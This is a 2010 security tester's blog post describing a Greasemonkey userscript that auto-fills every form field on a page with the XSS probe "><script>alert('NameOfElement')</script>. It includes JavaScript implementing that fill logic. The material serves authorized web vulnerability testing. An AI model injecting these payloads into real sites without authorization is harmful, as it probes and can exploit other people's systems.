Sunday, March 28, 2010

Basic XSS AutoFill Script

Sometimes it's nice to just browse through a site you are testing and quickly enumerate obvious XSS issues. And by obvious, I mean cut and dry, no cleverness needed. But then you encounter a large form and have to fill out the twenty fields with your test script. You hit submit and realize that 6 of them are vulnerable. Blah, now you have to go back and put in an individual alert message for each field to identify which of those 20 fields are the vulnerable ones.

I finally got tired of this and created a nice little Greasemonkey script. You can download it here.

After you load it into Greasemonkey, the script will automatically update all fields with the following basic XSS test:
"><script>alert('NameOfElement')</script>

The following HTML elements are affected:
  • text boxes
  • text areas
  • drop down menus
  • hidden fields
I also added a few items that are skipped, mainly fields that are called 'action' or 'token'. You can change this as you see fit.

The script will modify the mentioned elements for every page you view. So make sure to turn it off after you are done testing.
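The fill logic described above, written out as an added example; it is not the downloadable script from this post. The function names, the exact-match handling of the skip list, the name sanitizing, and the rewriting of each option's value for drop-down menus are assumptions.

```javascript
// Added example, not the original Greasemonkey script.
// Assumption: fields named exactly 'action' or 'token' are skipped.
const SKIP_NAMES = ['action', 'token'];

// The post's basic test string, labelled with the element's name.
// Assumption: characters that would break the quoted label are replaced,
// so the alert still identifies the field.
function buildProbe(name) {
  const label = String(name).replace(/[^\w-]/g, '_');
  return `"><script>alert('${label}')</script>`;
}

function shouldSkip(name) {
  return SKIP_NAMES.includes(String(name).toLowerCase());
}

// Accepts DOM elements or plain objects with the same properties.
// Returns the names of the elements that were modified.
function fillFields(elements) {
  const filled = [];
  for (const el of elements) {
    const tag = String(el.tagName || '').toLowerCase();
    const type = String(el.type || 'text').toLowerCase();
    const name = el.name || el.id;
    if (!name || shouldSkip(name)) continue;
    const probe = buildProbe(name);
    if (tag === 'textarea' || (tag === 'input' && (type === 'text' || type === 'hidden'))) {
      el.value = probe;
    } else if (tag === 'select') {
      // Assumption: a drop-down submits an option's value, so each option is rewritten.
      for (const opt of Array.from(el.options || [])) opt.value = probe;
    } else {
      continue; // buttons, checkboxes, etc. are left alone
    }
    filled.push(name);
  }
  return filled;
}

// Runs only inside a browser userscript; skipped elsewhere.
if (typeof document !== 'undefined') {
  fillFields(document.querySelectorAll('input, textarea, select'));
}
```

Because each alert carries the element's name, a single submit shows which fields reflect the input unencoded.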


-Michael Coates